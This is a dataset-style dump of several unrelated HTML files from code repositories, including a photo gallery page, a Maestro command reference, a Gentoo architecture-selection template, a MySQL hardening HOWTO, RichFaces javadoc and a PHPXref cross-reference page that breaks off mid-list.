path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
pics/eng.html
nobitagit/Buscape
--- title: Pics layout: default-eng --- <div id="container"> <section class="page-contents main cf" itemscope itemtype="http://schema.org/BarOrPub"> <figure class="gallery"> <img src="/i/gallery/1.jpg" class="gallery-pic" alt="" itemprop="photo"> <img src="/i/gallery/2.jpg" class="gallery-pic" alt="" itemprop="photo"> <img src="/i/gallery/3.jpg" class="gallery-pic" alt="" itemprop="photo"> <img src="/i/gallery/4.jpg" class="gallery-pic" alt="" itemprop="photo"> <img src="/i/gallery/5.jpg" class="gallery-pic" alt="" itemprop="photo"> <figcaption> All photos by: <a href="http://www.danielemauro.it">Daniele Mauro</a>. </figcaption> </figure> </section> <!-- page-contents --> </div> <!-- container --> </div> <!-- wrap -->
Schrodinger/Schrodinger_2017-1_docs/maestro_command_reference/propertyclearvalue.html
platinhom/ManualHom
<!DOCTYPE html> <html xmlns:MadCap="http://www.madcapsoftware.com/Schemas/MadCap.xsd" lang="en-US" xml:lang="en-US" data-mc-search-type="Stem" data-mc-help-system-file-name="Documentation.xml" data-mc-path-to-help-system="../" data-mc-target-type="WebHelp2" data-mc-runtime-file-type="Topic" data-mc-preload-images="false" data-mc-in-preview-mode="false" data-mc-toc-path="Command References|Maestro Command Reference|The Maestro Command Language"> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link href="../Skins/Default/Stylesheets/Slideshow.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/TextEffects.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/Topic.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/Components/Styles.css" rel="stylesheet" type="text/css" data-mc-generated="True" /><title>propertyclearvalue</title> <link href="../Resources/Stylesheets/docs.css" rel="stylesheet" /> <script src="../Resources/Scripts/custom.modernizr.js" type="text/javascript"> </script> <script src="../Resources/Scripts/jquery.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/require.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/require.config.js" type="text/javascript"> </script> <script src="../Resources/Scripts/foundation.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/plugins.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/MadCapAll.js" type="text/javascript"> </script> </head> <body><a name="aanchor7933"></a> <MadCap:concept term="Command References" /><a name="aanchor7934"></a> <MadCap:concept term="Maestro" /> <table class="NavLink" data-mc-conditions="Default.ScreenOnly"> <tr class="NavLink"> <td class="NavLeft"><span class="NavText">◀ <a class="NavLink MCXref xref xrefNavLink" href="propertycalculate.html" xrefformat="{paratext}">propertycalculate</a></span> </td> <td class="NavCenter"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="maestro_command_referenceTOC.htm" xrefformat="{paratext}">Maestro Command Reference Manual</a></span> </td> <td class="NavRight"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="propertycreate.html" xrefformat="{paratext}">propertycreate</a> ▶</span> </td> </tr> </table> <h1 class="title">propertyclearvalue</h1> <p>This command clear values of the given properties </p> <p>Syntax: <b>propertyclearvalue</b> <i>allentries</i>= true [&lt;propertynames&gt; ] </p> <p>Options:</p> <dl> <dt><i>allentries</i> </dt> <br /> <dd>The property value to be cleared for selected entries or all the entries. This has two valid values, true for clearing all property values and false for clearing property values for the selected entries only. </dd> <br /> <dd> <table summary=""> <tr align="left"> <td valign="top">Valid values:</td> <td><code>false</code> <br /><code>true</code> </td> </tr> <tr align="left"> <td valign="top">Default value: </td> <td valign="top"><b>false</b> <br /> </td> </tr> </table> </dd> <br /> </dl> <p>Operands:</p> <p>&lt;propertynames&gt; </p> <p>The names of properties for which values need to be cleared. </p> <table class="NavLink" data-mc-conditions="Default.ScreenOnly"> <tr class="NavLink"> <td class="NavLeft"><span class="NavText">◀ <a class="NavLink MCXref xref xrefNavLink" href="propertycalculate.html" xrefformat="{paratext}">propertycalculate</a></span> </td> <td class="NavCenter"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="maestro_command_referenceTOC.htm" xrefformat="{paratext}">Maestro Command Reference Manual</a></span> </td> <td class="NavRight"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="propertycreate.html" xrefformat="{paratext}">propertycreate</a> ▶</span> </td> </tr> </table> </body> </html>
gpackages/templates/modals/arch_choice_modal.html
bacher09/gentoo-packages
{% load url from future %} <div class="modal hide fade" id="ArchModal"> <script> // set default arches var default_arches = ['alpha', 'amd64', 'arm', 'hppa', 'ia64', 'ppc', 'ppc64', 'sparc', 'x86']; var exotic_arches = ['mk68k', 'mips', 's390', 'sh']; var fbsd_arches = ['amd64-fbsd', 'sparc-fbsd', 'x86-fbsd']; var linux_arches = ['alpha', 'amd64', 'arm', 'hppa', 'ia64', 'm68k', 'mips', 'ppc', 'ppc64', 's390', 'sh', 'sparc', 'x86']; var solaris_arches = ['sparc64-solaris', 'sparc-solaris', 'x64-solaris', 'x86-solaris']; var prefix_arches = ['amd64-linux', 'arm-linux', 'hppa-hpux', 'ia64-hpux', 'ia64-linux', 'm68k-mint', 'mips-irix', 'ppc-aix', 'ppc-macos', 'ppc-openbsd', 'sparc-solaris', 'sparc64-solaris', 'x64-freebsd', 'x64-macos', 'x64-openbsd', 'x64-solaris', 'x86-cygwin', 'x86-freebsd', 'x86-interix', 'x86-linux', 'x86-macos', 'x86-netbsd', 'x86-openbsd', 'x86-solaris', 'x86-winnt']; </script> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal">×</button> <h3>Arches choice</h3> </div> <form action="{% url 'archchoice' %}" method="post" enctype="multipart/form-data"> {% csrf_token %} {{ form.next }} <div class="arches modal-body"> <fieldset> {{ form.arches }} </fieldset> </div> <div class="modal-footer"> <a href="#" class="btn" data-dismiss="modal">Close</a> <input type="submit" class="btn btn-primary" value="Submit" /> </div> </form> </div> {{ form.media }}
doc/html/mysql-config.html
web-cyradm/web-cyradm
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML ><HEAD ><TITLE >Configuring MySQL</TITLE ><META NAME="GENERATOR" CONTENT="Modular DocBook HTML Stylesheet Version 1.7"><LINK REL="HOME" TITLE="Postfix-Cyrus-Web-cyradm-HOWTO" HREF="t1.html"><LINK REL="PREVIOUS" TITLE="Getting and installing the software" HREF="install.html"><LINK REL="NEXT" TITLE="Configuring PAM" HREF="pam-config.html"><META http-equiv="Content-Type" content="text/html; charset="></HEAD ><BODY CLASS="SECT1" ><DIV CLASS="NAVHEADER" ><TABLE SUMMARY="Header navigation table" WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" ><TR ><TH COLSPAN="3" ALIGN="center" >Postfix-Cyrus-Web-cyradm-HOWTO</TH ></TR ><TR ><TD WIDTH="10%" ALIGN="left" VALIGN="bottom" ><A HREF="install.html" ACCESSKEY="P" >Prev</A ></TD ><TD WIDTH="80%" ALIGN="center" VALIGN="bottom" ></TD ><TD WIDTH="10%" ALIGN="right" VALIGN="bottom" ><A HREF="pam-config.html" ACCESSKEY="N" >Next</A ></TD ></TR ></TABLE ><HR ALIGN="LEFT" WIDTH="100%"></DIV ><DIV CLASS="SECT1" ><H1 CLASS="SECT1" ><A NAME="MYSQL-CONFIG" >Configuring MySQL</A ></H1 ><DIV CLASS="SECT2" ><H2 CLASS="SECT2" ><A NAME="MYSQL-CONFIG-SECURING" >Securing MySQL</A ></H2 ><P >Because you are using MySQL to authenticate users, you need to restrict network access to port 3306.</P ><P >The easiest way is to only bind MySQL to the loopback interface 127.0.0.1. This makes sure nobody can connect to your MySQL daemon via the network.</P ><P > Edit <TT CLASS="FILENAME" >/etc/init.d/mysql.server</TT > and change line 107 as following:</P ><P >Original line:</P ><TABLE BORDER="0" BGCOLOR="#E0E0E0" WIDTH="100%" ><TR ><TD ><PRE CLASS="SCREEN" >$bindir/safe_mysqld --datadir=$datadir --pid-file=$pid_file&#38;</PRE ></TD ></TR ></TABLE ><P >Changed line:</P ><TABLE BORDER="0" BGCOLOR="#E0E0E0" WIDTH="100%" ><TR ><TD ><PRE CLASS="SCREEN" >$bindir/safe_mysqld --datadir=$datadir --pid-file=$pid_file \ --bind-address=127.0.0.1&#38;</PRE ></TD ></TR ></TABLE ><P >Restart your MySQL daemon by issuing the command<B CLASS="COMMAND" >/etc/init.d/mysql.server start</B ></P ><P >To ensure the configuration change was successful, <B CLASS="COMMAND" >netstat -an|grep LISTEN</B >. The Output should be looking similar to this:</P ><TABLE BORDER="0" BGCOLOR="#E0E0E0" WIDTH="100%" ><TR ><TD ><PRE CLASS="SCREEN" >bond:~ # netstat -an|grep LISTEN tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN</PRE ></TD ></TR ></TABLE ></DIV ><DIV CLASS="SECT2" ><H2 CLASS="SECT2" ><A NAME="MYSQL-RINETD" >Setting up rinetd</A ></H2 ><P >This step is only necessary if you run the MySQL sever on host other than the mail server. This allows you to securely connect from another host since access is allowed only from pre-defined IP addresses.</P ><P >The example used is from the view of the host serving the MySQL database. Lets assume your mail server has the IP 192.168.0.100 and the MySQL host has 192.168.0.200</P ><P > Edit <TT CLASS="FILENAME" >/etc/rinetd.conf</TT > and add:</P ><TABLE BORDER="0" BGCOLOR="#E0E0E0" WIDTH="100%" ><TR ><TD ><PRE CLASS="SCREEN" >192.168.0.200 3306 127.0.0.1 3306 allow 192.168.0.100</PRE ></TD ></TR ></TABLE ><P >This means: The MySQL host is listening on 192.168.0.200 port 3306. If 192.168.0.100 attempts a connection, it is forwarded to 127.0.0.1:3306. All other hosts are rejected. </P ></DIV ></DIV ><DIV CLASS="NAVFOOTER" ><HR ALIGN="LEFT" WIDTH="100%"><TABLE SUMMARY="Footer navigation table" WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" ><TR ><TD WIDTH="33%" ALIGN="left" VALIGN="top" ><A HREF="install.html" ACCESSKEY="P" >Prev</A ></TD ><TD WIDTH="34%" ALIGN="center" VALIGN="top" ><A HREF="t1.html" ACCESSKEY="H" >Home</A ></TD ><TD WIDTH="33%" ALIGN="right" VALIGN="top" ><A HREF="pam-config.html" ACCESSKEY="N" >Next</A ></TD ></TR ><TR ><TD WIDTH="33%" ALIGN="left" VALIGN="top" >Getting and installing the software</TD ><TD WIDTH="34%" ALIGN="center" VALIGN="top" >&nbsp;</TD ><TD WIDTH="33%" ALIGN="right" VALIGN="top" >Configuring PAM</TD ></TR ></TABLE ></DIV ></BODY ></HTML >
lib/richfaces/doc/javadoc/org/richfaces/component/class-use/UIDataAdaptor.html
Jacksson/mywmsnb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Thu Oct 23 20:37:09 CEST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Class org.richfaces.component.UIDataAdaptor (RichFaces Distribution Assembler 4.5.0.Final API)</title> <meta name="date" content="2014-10-23"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.richfaces.component.UIDataAdaptor (RichFaces Distribution Assembler 4.5.0.Final API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../../../../overview-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><b>RichFaces Distribution Assembler 4.5.0.Final</b></em></div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/richfaces/component/class-use/UIDataAdaptor.html" target="_top">Frames</a></li> <li><a href="UIDataAdaptor.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.richfaces.component.UIDataAdaptor" class="title">Uses of Class<br>org.richfaces.component.UIDataAdaptor</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.richfaces.component">org.richfaces.component</a></td> <td class="colLast"> <div class="block">Base RichFaces components interfaces and classes</div> </td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="org.richfaces.component"> <!-- --> </a> <h3>Uses of <a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a> in <a href="../../../../org/richfaces/component/package-summary.html">org.richfaces.component</a></h3> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subclasses, and an explanation"> <caption><span>Subclasses of <a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a> in <a href="../../../../org/richfaces/component/package-summary.html">org.richfaces.component</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/AbstractCollapsibleSubTable.html" title="class in org.richfaces.component">AbstractCollapsibleSubTable</a></strong></code> <div class="block"> The &lt;rich:collapsibleSubTable&gt; component acts as a child element to a &lt;rich:dataTable&gt; component.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/AbstractDataGrid.html" title="class in org.richfaces.component">AbstractDataGrid</a></strong></code> <div class="block"> The &lt;rich:dataGrid&gt; component is used to arrange data objects in a grid.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/AbstractDataTable.html" title="class in org.richfaces.component">AbstractDataTable</a></strong></code> <div class="block"> The &lt;rich:dataTable&gt; component is used to render a table, including the table's caption.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/AbstractExtendedDataTable.html" title="class in org.richfaces.component">AbstractExtendedDataTable</a></strong></code> <div class="block"> The &lt;rich:extendedDataTable&gt; component builds on the functionality of the &lt;rich:dataTable&gt; component, adding features such as scrolling for the table body (both horizontal and vertical), Ajax loading for vertical scrolling, frozen columns, row selection, and rearranging of columns.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/AbstractList.html" title="class in org.richfaces.component">AbstractList</a></strong></code> <div class="block">The &lt;rich:list&gt; component renders a list of items.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/AbstractTree.html" title="class in org.richfaces.component">AbstractTree</a></strong></code> <div class="block">The &lt;rich:tree&gt; component provides a hierarchical tree control.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UICollapsibleSubTable.html" title="class in org.richfaces.component">UICollapsibleSubTable</a></strong></code> <div class="block"> The &lt;rich:collapsibleSubTable&gt; component acts as a child element to a &lt;rich:dataTable&gt; component.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UIDataGrid.html" title="class in org.richfaces.component">UIDataGrid</a></strong></code> <div class="block"> The &lt;rich:dataGrid&gt; component is used to arrange data objects in a grid.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UIDataTable.html" title="class in org.richfaces.component">UIDataTable</a></strong></code> <div class="block"> The &lt;rich:dataTable&gt; component is used to render a table, including the table's caption.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UIDataTableBase.html" title="class in org.richfaces.component">UIDataTableBase</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UIExtendedDataTable.html" title="class in org.richfaces.component">UIExtendedDataTable</a></strong></code> <div class="block"> The &lt;rich:extendedDataTable&gt; component builds on the functionality of the &lt;rich:dataTable&gt; component, adding features such as scrolling for the table body (both horizontal and vertical), Ajax loading for vertical scrolling, frozen columns, row selection, and rearranging of columns.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UIList.html" title="class in org.richfaces.component">UIList</a></strong></code> <div class="block">The &lt;rich:list&gt; component renders a list of items.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UIRepeat.html" title="class in org.richfaces.component">UIRepeat</a></strong></code> <div class="block"> The non-visual &lt;a4j:repeat&gt; component is used to iterate through a data model.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UISequence.html" title="class in org.richfaces.component">UISequence</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/UITree.html" title="class in org.richfaces.component">UITree</a></strong></code> <div class="block">The &lt;rich:tree&gt; component provides a hierarchical tree control.</div> </td> </tr> </tbody> </table> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a href="../../../../org/richfaces/component/package-summary.html">org.richfaces.component</a> that return <a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a></code></td> <td class="colLast"><span class="strong">RowKeyContextEventWrapper.</span><code><strong><a href="../../../../org/richfaces/component/RowKeyContextEventWrapper.html#getComponent()">getComponent</a></strong>()</code>&nbsp;</td> </tr> </tbody> </table> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a href="../../../../org/richfaces/component/package-summary.html">org.richfaces.component</a> with parameters of type <a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">DataAdaptorIterationState.</span><code><strong><a href="../../../../org/richfaces/component/DataAdaptorIterationState.html#restoreComponentState(org.richfaces.component.UIDataAdaptor)">restoreComponentState</a></strong>(<a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a>&nbsp;uiDataAdaptor)</code>&nbsp;</td> </tr> </tbody> </table> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing constructors, and an explanation"> <caption><span>Constructors in <a href="../../../../org/richfaces/component/package-summary.html">org.richfaces.component</a> with parameters of type <a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colLast"><code><strong><a href="../../../../org/richfaces/component/RowKeyContextEventWrapper.html#RowKeyContextEventWrapper(org.richfaces.component.UIDataAdaptor,%20javax.faces.event.FacesEvent,%20java.lang.Object)">RowKeyContextEventWrapper</a></strong>(<a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">UIDataAdaptor</a>&nbsp;component, javax.faces.event.FacesEvent&nbsp;event, <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a>&nbsp;eventRowKey)</code>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../org/richfaces/component/UIDataAdaptor.html" title="class in org.richfaces.component">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../../../../overview-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><b>RichFaces Distribution Assembler 4.5.0.Final</b></em></div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/richfaces/component/class-use/UIDataAdaptor.html" target="_top">Frames</a></li> <li><a href="UIDataAdaptor.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2014 <a href="http://www.jboss.org">JBoss by Red Hat</a>. All Rights Reserved.</small></p> </body> </html>
_variables/signature.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $signature</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_variables'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logVariable('signature'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Variable Cross Reference</h3> <h2><a href="index.html#signature">$signature</a></h2> <b>Defined at:</b><ul> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</A> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l456"> line 456</A></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</A> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l461"> line 461</A></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</A> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l640"> line 640</A></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php</A> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DKIMSigner.php.source.html#l651"> line 651</A></li> <li><a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.html">/inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php</A> -> <a href="../inc/_ext/swift/classes/Swift/Signers/DomainKeySigner.php.source.html#l495"> line 495</A></li> </ul> <br><b>Referenced 18 times:</b><ul> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l88"> line 88</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l90"> line 90</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l193"> line 193</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l198"> line 198</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l201"> line 201</a></li> <li><a href="../plugins/twitter_plugin/twitteroauth/oauth.php.html">/plugins/twitter_plugin/twitteroauth/oauth.php</a> -> <a href="../plugins/twitter_plugin/twitteroauth/oauth.php.source.html#l202"> line 202</a></li> <li><a 